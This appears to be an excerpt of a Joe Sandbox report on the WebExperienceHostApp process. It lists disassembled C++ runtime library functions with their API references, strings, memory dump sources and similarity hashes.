Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: ExceptionThrowstd::ios_base::failure::failure
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2003779279-1866435925
Opcode ID: a6b4dea8a168317dac851dd429efa45bd2771e1e18792c249c39bd327d446b57
Instruction ID: ca15a7421c1b18c47dc93f86907f8b8486d6642eaad7b8fa6411381d872922a7
Opcode Fuzzy Hash: a6b4dea8a168317dac851dd429efa45bd2771e1e18792c249c39bd327d446b57
Instruction Fuzzy Hash: 8F91A32271AE4785EB648B15D4A1BB97760FB40B88F448036CA5E47BF9EFBDD546C300

Function 00007FFE13209E5C Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 120COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE13209EB8
DName::operator+.LIBVCRUNTIME ref: 00007FFE13209FE6

Strings

coclass , xrefs: 00007FFE13209F9F
class , xrefs: 00007FFE13209FFB
enum , xrefs: 00007FFE13209FA8
struct , xrefs: 00007FFE1320A00A
`unknown ecsu', xrefs: 00007FFE13209E84
cointerface , xrefs: 00007FFE13209F8D
union , xrefs: 00007FFE1320A013

Memory Dump Source

Source File: 00000005.00000002.1867000152.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000005.00000002.1866978919.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867033119.00007FFE13211000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867066118.00007FFE13216000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867099902.00007FFE13217000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe13200000_WebExperienceHostApp.jbxd

Similarity

API ID: Name::operator+
String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
API String ID: 2943138195-1464470183
Opcode ID: 2a39ff73fab8a5f8cf54c613ca86ba6d613e7bbbceaec38d40d1587625a9a752
Instruction ID: 8a136d566db302bbbe3f2c90ac952b246211f2211f9ba1a5d598581ce11f0e81
Opcode Fuzzy Hash: 2a39ff73fab8a5f8cf54c613ca86ba6d613e7bbbceaec38d40d1587625a9a752
Instruction Fuzzy Hash: 9D516C72F18B168CF710EB66E9546BC27B1BBA43A4F504179EA0E66AB5DF38D509C300

Function 00007FFDFBA7BE90 Relevance: 15.2, APIs: 10, Instructions: 167COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFBA7C618: iswspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDFBA7BC62), ref: 00007FFDFBA7C63E
Part of subcall function 00007FFDFBA7C618: iswxdigit.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDFBA7BC62), ref: 00007FFDFBA7C6B6

_FXp_setw.LIBCPMT ref: 00007FFDFBA7BF2E
_FXp_setw.LIBCPMT ref: 00007FFDFBA7BF41
_FXp_setn.LIBCPMT ref: 00007FFDFBA7BF85
_FXp_addx.LIBCPMT ref: 00007FFDFBA7BF97
_FXp_setw.LIBCPMT ref: 00007FFDFBA7BFEE
_FXp_setw.LIBCPMT ref: 00007FFDFBA7C001
_FXp_setn.LIBCPMT ref: 00007FFDFBA7BF4C

Part of subcall function 00007FFDFBA71384: _FXp_setw.LIBCPMT ref: 00007FFDFBA713BD

_FXp_setn.LIBCPMT ref: 00007FFDFBA7C00C
_FXp_setn.LIBCPMT ref: 00007FFDFBA7C045
_FXp_addx.LIBCPMT ref: 00007FFDFBA7C057

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: Xp_setw$Xp_setn$Xp_addx$iswspaceiswxdigit
String ID:
API String ID: 3781602613-0
Opcode ID: b37f4c65fcaae6089a39f6864dfb20dfbddd16cc03fc4d6b826aaf6d26e5b500
Instruction ID: 47ee532cc225ef4ecd2e03cd8072352c8f36f497c452d6b208c8a47a5d07a866
Opcode Fuzzy Hash: b37f4c65fcaae6089a39f6864dfb20dfbddd16cc03fc4d6b826aaf6d26e5b500
Instruction Fuzzy Hash: 4D61B026F0E5439AE711DBA2E4A09FD3361EB5474CF604136DE1D63AEDEE78E50A8340

Function 00007FFE132085D8 Relevance: 15.2, APIs: 10, Instructions: 150COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE132086A2
DName::operator+.LIBVCRUNTIME ref: 00007FFE132086B2
DName::operator+.LIBVCRUNTIME ref: 00007FFE132086FE
DName::operator+.LIBVCRUNTIME ref: 00007FFE1320870E
DName::operator+.LIBVCRUNTIME ref: 00007FFE1320871E
DName::operator+.LIBVCRUNTIME ref: 00007FFE13208791
DName::operator+.LIBVCRUNTIME ref: 00007FFE132087A2
DName::operator+.LIBVCRUNTIME ref: 00007FFE132087B4
DName::operator+.LIBVCRUNTIME ref: 00007FFE132087E0
DName::operator+.LIBVCRUNTIME ref: 00007FFE132087EF

Memory Dump Source

Source File: 00000005.00000002.1867000152.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000005.00000002.1866978919.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867033119.00007FFE13211000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867066118.00007FFE13216000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867099902.00007FFE13217000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe13200000_WebExperienceHostApp.jbxd

Similarity

API ID: Name::operator+
String ID:
API String ID: 2943138195-0
Opcode ID: dffebbea1b9ec54e41ee59c5f9df16e35c1e11239b438fd42c02bfbe0f2f9bce
Instruction ID: 03f5683deecf8cce234c33e7e3a31f02e433f0aeebb27ae8141b1cf7deebfc53
Opcode Fuzzy Hash: dffebbea1b9ec54e41ee59c5f9df16e35c1e11239b438fd42c02bfbe0f2f9bce
Instruction Fuzzy Hash: 84615E62B04B669CFB10EBA2D8801ED27B1FB947A8F504475DE0D2BA69DFB8D549C340

Function 00007FFE132031C0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 314COMMON

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FFE1320335E
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1320336B

Part of subcall function 00007FFE13206770: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE132023AE), ref: 00007FFE1320677E

terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE13203619
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE13203664
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFE13203699

Strings

csm, xrefs: 00007FFE13203387
csm, xrefs: 00007FFE13203307
csm, xrefs: 00007FFE132032A5

Memory Dump Source

Source File: 00000005.00000002.1867000152.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000005.00000002.1866978919.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867033119.00007FFE13211000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867066118.00007FFE13216000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867099902.00007FFE13217000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe13200000_WebExperienceHostApp.jbxd

Similarity

API ID: abortterminate$Is_bad_exception_allowedstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 211107550-393685449
Opcode ID: 85374f18d14079de111c801c7233a0368ceba0e7784a87de6593dae95347d848
Instruction ID: b0e152f4ba5d08d56d8d8fba073af9965b083ae64a4baf2e1dcc6c86ce7159a2
Opcode Fuzzy Hash: 85374f18d14079de111c801c7233a0368ceba0e7784a87de6593dae95347d848
Instruction Fuzzy Hash: 49E1A272908A818EE720AF36D4802AE77A0FBA57A8F144175DB4D67775CF38E589C740

Function 00007FFDFBA7AB10 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 148COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFBA7AB4D
tolower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFBA7ABEB
memchr.VCRUNTIME140_APP ref: 00007FFDFBA7ABFD
tolower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFBA7AC38
memchr.VCRUNTIME140_APP ref: 00007FFDFBA7AC46
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA7ACC6

Strings

0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 00007FFDFBA7ABF4, 00007FFDFBA7AC07
0, xrefs: 00007FFDFBA7AB88

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: memchrtolower$_errnoisspace
String ID: 0$0123456789abcdefghijklmnopqrstuvwxyz
API String ID: 3508154992-2692187688
Opcode ID: 28ebbe5085ce22d7c59ed57fe41f67953adc3779f489bac788e36eaca0986cc2
Instruction ID: dfcfb859ac166c8fc8986e64b72bd40fef77ea013d9f5f03f0a1772d3cc3a8d5
Opcode Fuzzy Hash: 28ebbe5085ce22d7c59ed57fe41f67953adc3779f489bac788e36eaca0986cc2
Instruction Fuzzy Hash: 4A51DA12B0E6C766E7618A64F434B7977A1EB85758F684030CDBD467FDEEBC98428700

Function 00007FFE1320BB38 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 111COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1320BCEC

Part of subcall function 00007FFE13208918: DName::operator+.LIBVCRUNTIME ref: 00007FFE13208E23
Part of subcall function 00007FFE13208918: DName::operator+.LIBVCRUNTIME ref: 00007FFE13208E5B

DName::operator+.LIBVCRUNTIME ref: 00007FFE1320BC9E

Strings

std::nullptr_t , xrefs: 00007FFE1320BC2A
cli::array<, xrefs: 00007FFE1320BC6B
cli::pin_ptr<, xrefs: 00007FFE1320BCB5
void, xrefs: 00007FFE1320BB82
void , xrefs: 00007FFE1320BBAA
std::nullptr_t, xrefs: 00007FFE1320BC17

Memory Dump Source

Source File: 00000005.00000002.1867000152.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000005.00000002.1866978919.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867033119.00007FFE13211000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867066118.00007FFE13216000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867099902.00007FFE13217000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe13200000_WebExperienceHostApp.jbxd

Similarity

API ID: Name::operator+
String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
API String ID: 2943138195-2239912363
Opcode ID: e0836a3629a813ef90ef895af03e740072fc2db4661fc217a7dce682d3bfee39
Instruction ID: 6dc87e275955462def47ecdf883663f4ed785fef6159a1a5bb26d1b304eef8f8
Opcode Fuzzy Hash: e0836a3629a813ef90ef895af03e740072fc2db4661fc217a7dce682d3bfee39
Instruction Fuzzy Hash: 5A514C62E08F569DFB21AF62D8442BD37B0ABA8764F4441B5DE4D327A9DF7C9148C700

Function 00007FFDFBA46BD0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 73COMMON

Download Yara Rule

APIs

std::ios_base::failure::failure.LIBCPMT ref: 00007FFDFBA46C24
_CxxThrowException.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,?,?,00007FFDFBA46650,?,?,?,00007FFDFBA4838D), ref: 00007FFDFBA46C35
_CxxThrowException.VCRUNTIME140_APP ref: 00007FFDFBA46C62
std::ios_base::failure::failure.LIBCPMT ref: 00007FFDFBA46CA5
_CxxThrowException.VCRUNTIME140_APP ref: 00007FFDFBA46CB6

Strings

ios_base::failbit set, xrefs: 00007FFDFBA46BD0, 00007FFDFBA46BF8, 00007FFDFBA46C79
ios_base::eofbit set, xrefs: 00007FFDFBA46BFF, 00007FFDFBA46C80
ios_base::badbit set, xrefs: 00007FFDFBA46BEC, 00007FFDFBA46C40, 00007FFDFBA46C6D

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: ExceptionThrow$std::ios_base::failure::failure
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 1099746521-1866435925
Opcode ID: a6bf273394677bb2e99abd8e534fce184576f9646bbe71793b055ca8774240fa
Instruction ID: c48894bfc8a6dbf5344d0ac8b1257af70c643029628288de60707dea96e20268
Opcode Fuzzy Hash: a6bf273394677bb2e99abd8e534fce184576f9646bbe71793b055ca8774240fa
Instruction Fuzzy Hash: C1210261B1B907D1EB409704E8A2EFA3360AF50348F885075D62E065FEEFACE345C340

Function 00007FFDFBA89E80 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 171COMMON

Download Yara Rule

APIs

std::ios_base::failure::failure.LIBCPMT ref: 00007FFDFBA8A08E
_CxxThrowException.VCRUNTIME140_APP ref: 00007FFDFBA8A09F
std::ios_base::failure::failure.LIBCPMT ref: 00007FFDFBA8A0E2
_CxxThrowException.VCRUNTIME140_APP ref: 00007FFDFBA8A0F3

Strings

ios_base::failbit set, xrefs: 00007FFDFBA8A062, 00007FFDFBA8A0B6
ios_base::eofbit set, xrefs: 00007FFDFBA8A069, 00007FFDFBA8A0BD
ios_base::badbit set, xrefs: 00007FFDFBA8A056, 00007FFDFBA8A0AA

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: ExceptionThrowstd::ios_base::failure::failure
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2003779279-1866435925
Opcode ID: 9cb79d3691d168e0564d9f4c501592dad693ea5c078e9f50b8527a96bed53c60
Instruction ID: 575ccc16b799cea756ec421a09ba8cbe73f9619e91f674c86988458396f536d4
Opcode Fuzzy Hash: 9cb79d3691d168e0564d9f4c501592dad693ea5c078e9f50b8527a96bed53c60
Instruction Fuzzy Hash: A2617F2270AE4795EB648B15D4A1BB97760EB80F89F448036CA5E477F9DFBDD44AC300

Function 00007FFDFBA54BB0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 166fileCOMMON

Download Yara Rule

APIs

std::ios_base::failure::failure.LIBCPMT ref: 00007FFDFBA54C54
_CxxThrowException.VCRUNTIME140_APP ref: 00007FFDFBA54C65
fputwc.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFDFBA54D41
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFDFBA54DCD

Strings

ios_base::failbit set, xrefs: 00007FFDFBA54C28
ios_base::eofbit set, xrefs: 00007FFDFBA54C2F
ios_base::badbit set, xrefs: 00007FFDFBA54C1D

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: ExceptionThrowfputwcfwritestd::ios_base::failure::failure
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 1428583292-1866435925
Opcode ID: a7380e94e6d0c0f3b865c1dec62774918b944c1c4d491e2328d2bb9d19e9cd10
Instruction ID: 209e5157dbb2f160d7862b8799d88d603922e97cc6996b1915911269189db093
Opcode Fuzzy Hash: a7380e94e6d0c0f3b865c1dec62774918b944c1c4d491e2328d2bb9d19e9cd10
Instruction Fuzzy Hash: 7B619B7371AA8795EB50CF25E4A0AAD33A0FB44B88F854032EA5D477ACDF78E655C300

Function 00007FFE13205F4A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 162COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE13206430: RtlPcToFileHeader.API-MS-WIN-CORE-RTLSUPPORT-L1-1-0 ref: 00007FFE13206474
Part of subcall function 00007FFE13206430: RaiseException.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFE132064BA

RtlPcToFileHeader.API-MS-WIN-CORE-RTLSUPPORT-L1-1-0 ref: 00007FFE13205FE7
FindMITargetTypeInstance.LIBVCRUNTIME ref: 00007FFE13206043

Strings

Attempted a typeid of nullptr pointer!, xrefs: 00007FFE13206125
Bad read pointer - no RTTI data!, xrefs: 00007FFE13206148
Access violation - no RTTI data!, xrefs: 00007FFE13205F4A, 00007FFE1320616B
Bad dynamic_cast!, xrefs: 00007FFE132060B2

Memory Dump Source

Source File: 00000005.00000002.1867000152.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000005.00000002.1866978919.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867033119.00007FFE13211000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867066118.00007FFE13216000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867099902.00007FFE13217000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe13200000_WebExperienceHostApp.jbxd

Similarity

API ID: FileHeader$ExceptionFindInstanceRaiseTargetType
String ID: Access violation - no RTTI data!$Attempted a typeid of nullptr pointer!$Bad dynamic_cast!$Bad read pointer - no RTTI data!
API String ID: 1852475696-928371585
Opcode ID: 6b9ef99d590b32f0c659d059e5f7edc288c3d0282fa246750663d343d086c454
Instruction ID: 993d7469ef26376d142bf8875673e4a5806ab986f642738f9e9ff0ed9405b1d9
Opcode Fuzzy Hash: 6b9ef99d590b32f0c659d059e5f7edc288c3d0282fa246750663d343d086c454
Instruction Fuzzy Hash: A251A362A1DE469AEA30EB12E5906BD6360FFE4BA4F604171DA8D23775DF3CE509C300

Function 00007FFDFBA89C20 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 160COMMON

Download Yara Rule

APIs

std::ios_base::failure::failure.LIBCPMT ref: 00007FFDFBA89E13
_CxxThrowException.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFDFBA7CB58), ref: 00007FFDFBA89E24
std::ios_base::failure::failure.LIBCPMT ref: 00007FFDFBA89E67
_CxxThrowException.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFDFBA7CB58), ref: 00007FFDFBA89E78

Strings

ios_base::failbit set, xrefs: 00007FFDFBA89DE7, 00007FFDFBA89E3B
ios_base::eofbit set, xrefs: 00007FFDFBA89DEE, 00007FFDFBA89E42
ios_base::badbit set, xrefs: 00007FFDFBA89DDB, 00007FFDFBA89E2F

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: ExceptionThrowstd::ios_base::failure::failure
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2003779279-1866435925
Opcode ID: 36d0e9059c3f7a5d91012be966453ad462b8d1acf47367d5311b1a054c73d7d8
Instruction ID: f76dd0ca4549e7fa7f86df0f065b74b5b6bd86ca04e5ca856a614d25e8a9e66a
Opcode Fuzzy Hash: 36d0e9059c3f7a5d91012be966453ad462b8d1acf47367d5311b1a054c73d7d8
Instruction Fuzzy Hash: DA618E22B0AE4685EB64CB15D4A1BB97761FB80B89F449036CA6E477F9CFACD446C340

Function 00007FFDFBA7A900 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 152COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFBA7A94A
tolower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFBA7A9DC
memchr.VCRUNTIME140_APP ref: 00007FFDFBA7A9EE
tolower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFBA7AA23
memchr.VCRUNTIME140_APP ref: 00007FFDFBA7AA31
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA7AAAF

Strings

0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 00007FFDFBA7A9E5, 00007FFDFBA7A9FB

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: memchrtolower$_errnoisspace
String ID: 0123456789abcdefghijklmnopqrstuvwxyz
API String ID: 3508154992-4256519037
Opcode ID: c43dd37b695d77a9b309dd68fdeaa8cc30da9b2a4874080a3472f04000c7b43e
Instruction ID: d17d4b156ea71a89df81ca8565b5773377e0fd51d9fa84f1c53c90df1945b57c
Opcode Fuzzy Hash: c43dd37b695d77a9b309dd68fdeaa8cc30da9b2a4874080a3472f04000c7b43e
Instruction Fuzzy Hash: FF51D713B0E78756E7614A25F530B7D7690EB85B9CF294031C9AD427E8EEBC99429700

Function 00007FFDFBA4B0F0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

std::ios_base::failure::failure.LIBCPMT ref: 00007FFDFBA4B181
_CxxThrowException.VCRUNTIME140_APP ref: 00007FFDFBA4B192
std::ios_base::failure::failure.LIBCPMT ref: 00007FFDFBA4B287
_CxxThrowException.VCRUNTIME140_APP ref: 00007FFDFBA4B298

Strings

ios_base::failbit set, xrefs: 00007FFDFBA4B155, 00007FFDFBA4B25B
ios_base::eofbit set, xrefs: 00007FFDFBA4B15C, 00007FFDFBA4B262
ios_base::badbit set, xrefs: 00007FFDFBA4B14A, 00007FFDFBA4B250

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: ExceptionThrowstd::ios_base::failure::failure
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2003779279-1866435925
Opcode ID: 4b79d5893f130ff8fdc1ea0ab7b7df0118dd7d56f78d91c6625c63aa5aa301b0
Instruction ID: ac6e60d7d9b9406279f166e0c50d48ca001f073d11280f34a4d8b1973007dd10
Opcode Fuzzy Hash: 4b79d5893f130ff8fdc1ea0ab7b7df0118dd7d56f78d91c6625c63aa5aa301b0
Instruction Fuzzy Hash: A9515166B0AA4BC1EB10DB19D4A1AA97360FB44B88F944136DA2E477F9DFBCD546C300

Function 00007FF625A15204 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

__std_exception_copy.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,00007FF625A1505F,?,?,00000000,00007FF625A132B7), ref: 00007FF625A1526A
_CxxThrowException.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,00007FF625A1505F,?,?,00000000,00007FF625A132B7), ref: 00007FF625A15286
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00007FF625A1505F,?,?,00000000,00007FF625A132B7), ref: 00007FF625A1528C
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00007FF625A1505F,?,?,00000000,00007FF625A132B7), ref: 00007FF625A15299
_CxxThrowException.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,00007FF625A1505F,?,?,00000000,00007FF625A132B7), ref: 00007FF625A152D0

Strings

bad allocation, xrefs: 00007FF625A152AB
length, xrefs: 00007FF625A1524F

Memory Dump Source

Source File: 00000005.00000002.1866698009.00007FF625A11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF625A10000, based on PE: true

Associated: 00000005.00000002.1866676299.00007FF625A10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866720971.00007FF625A1A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866748253.00007FF625A1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866777794.00007FF625A1F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff625a10000_WebExperienceHostApp.jbxd

Similarity

